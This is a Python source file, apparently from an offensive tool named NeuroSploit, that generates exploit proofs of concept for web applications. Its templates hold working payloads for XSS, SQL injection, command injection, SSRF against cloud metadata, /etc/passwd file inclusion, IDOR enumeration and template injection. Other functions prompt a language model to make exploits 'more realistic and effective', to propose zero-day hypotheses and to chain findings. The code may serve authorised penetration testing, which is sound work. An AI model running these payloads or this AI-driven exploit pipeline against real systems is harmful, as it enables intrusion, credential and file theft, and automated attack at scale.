""" NeuroSploit v3 - AI-Powered Exploit & PoC Generator Context-aware exploit generation that: 1. Analyzes finding context (endpoint, params, tech stack, defenses) 2. Selects base PoC template and customizes for target 3. Adds evasion techniques if WAF detected 4. Uses AI to enhance PoC realism and effectiveness 5. Generates multiple formats (curl, Python, HTML, Burp) 6. Supports zero-day hypothesis reasoning 7. Generates chained multi-step exploits """ import json import re from dataclasses import dataclass, field from typing import Dict, List, Optional, Any from urllib.parse import urlparse, urlencode, quote @dataclass class ExploitResult: """Generated exploit with metadata.""" poc_code: str = "" format: str = "python" # python, curl, html, burp formats: Dict[str, str] = field(default_factory=dict) # All formats validated: bool = False evasion_applied: bool = False ai_enhanced: bool = False description: str = "" impact: str = "" steps: List[str] = field(default_factory=list) token_cost: int = 0 @dataclass class ZeroDayHypothesis: """AI-generated hypothesis about unknown vulnerabilities.""" hypothesis: str reasoning: str test_cases: List[Dict] = field(default_factory=list) confidence: float = 0.0 vuln_type: str = "" class ExploitGenerator: """Generates validated, context-aware exploits and PoCs. Replaces the basic poc_generator with AI-enhanced, multi-format, context-aware exploit generation. """ # PoC templates by vulnerability type POC_TEMPLATES = { "xss_reflected": { "curl": 'curl -s "{url}?{param}={payload}" | grep -i "{marker}"', "python": '''import requests url = "{url}" payload = "{payload}" params = {{"{param}": payload}} resp = requests.get(url, params=params, allow_redirects=False) if payload in resp.text: print("[VULNERABLE] XSS reflected - payload executed in response") print(f"URL: {{resp.url}}") else: print("[SAFE] Payload not reflected")''', "html": '''

XSS PoC - {url}

Click the link below to trigger the XSS:

Trigger XSS

Automated Test:

''', }, "xss_stored": { "python": '''import requests # Step 1: Submit stored payload url = "{url}" data = {{"{param}": "{payload}"}} resp = requests.post(url, data=data) print(f"[1] Submission: {{resp.status_code}}") # Step 2: Verify payload on display page display_url = "{display_url}" resp2 = requests.get(display_url) if "{payload}" in resp2.text or "{marker}" in resp2.text: print("[VULNERABLE] Stored XSS - payload persisted and rendered") else: print("[CHECK] Payload submitted but not found on display page")''', }, "sqli_error": { "curl": 'curl -s "{url}?{param}={payload}" 2>&1 | grep -iE "sql|syntax|mysql|ora-|postgres|sqlite"', "python": '''import requests url = "{url}" # Test 1: Error-based detection payloads = ["{payload}", "' OR '1'='1", "1 UNION SELECT NULL--"] for p in payloads: resp = requests.get(url, params={{"{param}": p}}) errors = ["sql", "syntax", "mysql", "ora-", "postgres", "sqlite", "microsoft"] if any(e in resp.text.lower() for e in errors): print(f"[VULNERABLE] SQL Error with payload: {{p}}") print(f"Response snippet: {{resp.text[:300]}}") break else: print("[SAFE] No SQL errors detected")''', }, "sqli_blind": { "python": '''import requests import time url = "{url}" param = "{param}" # Boolean-based test true_resp = requests.get(url, params={{param: "1' AND '1'='1"}}) false_resp = requests.get(url, params={{param: "1' AND '1'='2"}}) if len(true_resp.text) != len(false_resp.text): print("[VULNERABLE] Boolean-based blind SQLi detected") print(f" TRUE response: {{len(true_resp.text)}} bytes") print(f" FALSE response: {{len(false_resp.text)}} bytes") # Time-based test start = time.time() time_resp = requests.get(url, params={{param: "1' AND SLEEP(3)--"}}, timeout=10) elapsed = time.time() - start if elapsed > 3: print(f"[VULNERABLE] Time-based blind SQLi ({{elapsed:.1f}}s delay)") else: print("[SAFE] No time-based injection detected")''', }, "command_injection": { "curl": 'curl -s "{url}?{param}={payload}"', "python": '''import requests url = "{url}" payloads = [ "{payload}", "; id", "| id", "$(id)", "`id`", ] for p in payloads: resp = requests.get(url, params={{"{param}": p}}) if "uid=" in resp.text or "gid=" in resp.text: print(f"[VULNERABLE] Command injection with: {{p}}") print(f"Output: {{resp.text[:500]}}") break else: print("[SAFE] No command injection detected")''', }, "ssrf": { "python": '''import requests url = "{url}" param = "{param}" # Test internal resources targets = [ "http://127.0.0.1/", "http://localhost/", "http://169.254.169.254/latest/meta-data/", "http://[::1]/", "http://0.0.0.0/", ] for target in targets: resp = requests.get(url, params={{param: target}}, timeout=10) if resp.status_code == 200 and len(resp.text) > 0: if any(k in resp.text.lower() for k in ["ami-id", "instance", "root:", "localhost"]): print(f"[VULNERABLE] SSRF to {{target}}") print(f"Response: {{resp.text[:300]}}") break else: print("[SAFE] No SSRF detected")''', }, "lfi": { "curl": 'curl -s "{url}?{param}=../../../../../../etc/passwd" | grep "root:"', "python": '''import requests url = "{url}" param = "{param}" traversals = [ "../../../../../../etc/passwd", "..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini", "....//....//....//....//etc/passwd", "/etc/passwd", "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", ] for t in traversals: resp = requests.get(url, params={{param: t}}) if "root:" in resp.text or "[fonts]" in resp.text: print(f"[VULNERABLE] LFI with: {{t}}") print(f"Content: {{resp.text[:500]}}") break else: print("[SAFE] No LFI detected")''', }, "idor": { "python": '''import requests url = "{url}" param = "{param}" # Test with sequential IDs responses = {{}} for test_id in [1, 2, 3, 100, 999]: resp = requests.get(url, params={{param: str(test_id)}}) responses[test_id] = {{ "status": resp.status_code, "length": len(resp.text), "has_data": resp.status_code == 200 and len(resp.text) > 100 }} print(f" ID={{test_id}}: status={{resp.status_code}}, size={{len(resp.text)}}") # Check if different IDs return different data (IDOR indicator) data_ids = [k for k, v in responses.items() if v["has_data"]] if len(data_ids) > 1: sizes = [responses[k]["length"] for k in data_ids] if len(set(sizes)) > 1: print("[VULNERABLE] IDOR - Different IDs return different data") else: print("[CHECK] Same data for all IDs - may be public data") else: print("[SAFE] No unauthorized data access detected")''', }, "ssti": { "python": '''import requests url = "{url}" param = "{param}" # Template expression tests tests = [ ("{{{{7*7}}}}", "49"), ("${{7*7}}", "49"), ("<%=7*7%>", "49"), ("{payload}", "{expected}"), ] for expr, expected in tests: resp = requests.get(url, params={{param: expr}}) if expected in resp.text: print(f"[VULNERABLE] SSTI - {{expr}} evaluated to {{expected}}") print(f"Template engine detected in response") break else: print("[SAFE] No template injection detected")''', }, } def __init__(self, poc_generator=None): """Initialize with optional base poc_generator for template fallback.""" self.base_generator = poc_generator async def generate(self, finding, recon_data=None, llm=None, budget=None, waf_detected: bool = False) -> ExploitResult: """Generate a complete, context-aware exploit for a confirmed finding.""" vuln_type = getattr(finding, "vulnerability_type", "") endpoint = getattr(finding, "affected_endpoint", "") param = getattr(finding, "parameter", "") payload = getattr(finding, "payload", "") evidence = getattr(finding, "evidence", "") result = ExploitResult(description=f"PoC for {vuln_type} on {endpoint}") # 1. Get base template template = self.POC_TEMPLATES.get(vuln_type, {}) # 2. Generate all formats context = { "url": endpoint, "param": param or "PARAM", "payload": payload, "payload_encoded": quote(payload, safe=""), "marker": self._extract_marker(payload, vuln_type), "display_url": endpoint, # For stored XSS "expected": self._get_expected_output(payload, vuln_type), } for fmt, tmpl in template.items(): try: result.formats[fmt] = tmpl.format(**context) except (KeyError, IndexError): result.formats[fmt] = tmpl # 3. AI enhancement (if budget available) if llm and budget and not budget.should_skip("enhancement"): est_tokens = 1500 if budget.can_spend("enhancement", est_tokens): enhanced = await self._ai_enhance_poc( vuln_type, endpoint, param, payload, evidence, result.formats.get("python", ""), llm ) if enhanced: result.formats["python"] = enhanced result.ai_enhanced = True budget.record("enhancement", est_tokens, f"poc_{vuln_type}") result.token_cost = est_tokens # 4. Select primary format result.poc_code = result.formats.get("python", result.formats.get("curl", result.formats.get("html", ""))) # 5. Fallback to base generator if not result.poc_code and self.base_generator: result.poc_code = self.base_generator.generate( vuln_type, endpoint, param, payload, evidence ) # 6. Generate steps result.steps = self._generate_steps(vuln_type, endpoint, param, payload) return result async def generate_zero_day_hypothesis(self, recon_data, findings: list, llm, budget) -> List[ZeroDayHypothesis]: """AI reasoning about potential unknown vulnerabilities.""" if not llm or budget.should_skip("reasoning"): return [] est_tokens = 3000 if not budget.can_spend("reasoning", est_tokens): return [] findings_summary = [] for f in findings[:10]: findings_summary.append({ "type": getattr(f, "vulnerability_type", ""), "endpoint": getattr(f, "affected_endpoint", ""), "param": getattr(f, "parameter", ""), }) tech = getattr(recon_data, "technologies", []) if recon_data else [] endpoints = [] if recon_data: for ep in getattr(recon_data, "endpoints", [])[:15]: if isinstance(ep, dict): endpoints.append(ep.get("url", "")) elif isinstance(ep, str): endpoints.append(ep) prompt = f"""You are a senior security researcher analyzing a web application for potential zero-day vulnerabilities. **Technology Stack:** {', '.join(tech[:10])} **Known Endpoints:** {json.dumps(endpoints[:10])} **Confirmed Vulnerabilities:** {json.dumps(findings_summary)} Based on the technology stack, application behavior, and confirmed vulnerabilities, hypothesize about potential UNKNOWN vulnerabilities that standard scanners would miss. Think about: - Logic flaws in the application flow - Race conditions in state-changing operations - Deserialization issues in the detected framework - Authentication/authorization edge cases - Unusual parameter combinations that might trigger bugs Respond in JSON: {{ "hypotheses": [ {{ "hypothesis": "Description of the potential vulnerability", "reasoning": "Why this might exist based on evidence", "vuln_type": "closest_vuln_type", "test_cases": [{{"method": "GET", "url": "/path", "params": {{"key": "value"}}}}], "confidence": 0.3 }} ] }}""" try: response = await llm.generate(prompt, "You are a senior security researcher.") budget.record("reasoning", est_tokens, "zero_day_hypothesis") match = re.search(r'\{.*\}', response, re.DOTALL) if match: data = json.loads(match.group()) hypotheses = [] for h in data.get("hypotheses", [])[:5]: hypotheses.append(ZeroDayHypothesis( hypothesis=h.get("hypothesis", ""), reasoning=h.get("reasoning", ""), test_cases=h.get("test_cases", []), confidence=min(1.0, max(0.0, float(h.get("confidence", 0.2)))), vuln_type=h.get("vuln_type", ""), )) return hypotheses except Exception: pass return [] async def generate_chained_exploit(self, chain: List, llm=None) -> str: """Generate exploit that chains multiple findings.""" if not chain: return "" steps = [] for i, finding in enumerate(chain, 1): vtype = getattr(finding, "vulnerability_type", "unknown") endpoint = getattr(finding, "affected_endpoint", "") payload = getattr(finding, "payload", "") steps.append(f"""# Step {i}: {vtype} # Target: {endpoint} # Payload: {payload} print(f"[Step {i}] Exploiting {vtype} on {endpoint}") resp_{i} = requests.get("{endpoint}", params={{"{getattr(finding, 'parameter', 'param')}": "{payload}"}}) print(f" Status: {{resp_{i}.status_code}}") """) return f"""import requests # Multi-Step Exploit Chain # Steps: {' -> '.join(getattr(f, 'vulnerability_type', '?') for f in chain)} session = requests.Session() {''.join(steps)} print("[CHAIN COMPLETE] All steps executed") """ def format_poc(self, exploit: ExploitResult, fmt: str) -> str: """Get PoC in specific format.""" return exploit.formats.get(fmt, exploit.poc_code) # ── Internal Helpers ── async def _ai_enhance_poc(self, vuln_type: str, endpoint: str, param: str, payload: str, evidence: str, base_poc: str, llm) -> Optional[str]: """Use AI to enhance the base PoC.""" prompt = f"""Improve this PoC script to be more realistic and effective. Vulnerability: {vuln_type} Endpoint: {endpoint} Parameter: {param} Evidence: {evidence[:300]} Current PoC: ```python {base_poc[:1000]} ``` Requirements: 1. Add proper error handling 2. Add clear success/failure output 3. Include verification step 4. Keep it concise (max 40 lines) Return ONLY the improved Python code, no explanation.""" try: response = await llm.generate(prompt, "You are a security engineer writing PoC code.") # Extract code block code_match = re.search(r'```python\n(.*?)```', response, re.DOTALL) if code_match: return code_match.group(1).strip() # If no code block, check if response looks like code if "import " in response and "requests" in response: return response.strip() except Exception: pass return None def _extract_marker(self, payload: str, vuln_type: str) -> str: """Extract a marker string from payload for grep verification.""" if "alert" in payload: return "alert" if "script" in payload.lower(): return "script" return payload[:20] if payload else vuln_type def _get_expected_output(self, payload: str, vuln_type: str) -> str: """Get expected output for template expression evaluation.""" if "7*7" in payload: return "49" if "7*8" in payload: return "56" return "" def _generate_steps(self, vuln_type: str, endpoint: str, param: str, payload: str) -> List[str]: """Generate human-readable exploitation steps.""" return [ f"1. Navigate to {endpoint}", f"2. Inject payload into '{param}' parameter: {payload[:80]}", f"3. Observe response for {vuln_type} indicators", f"4. Verify exploitation impact", ]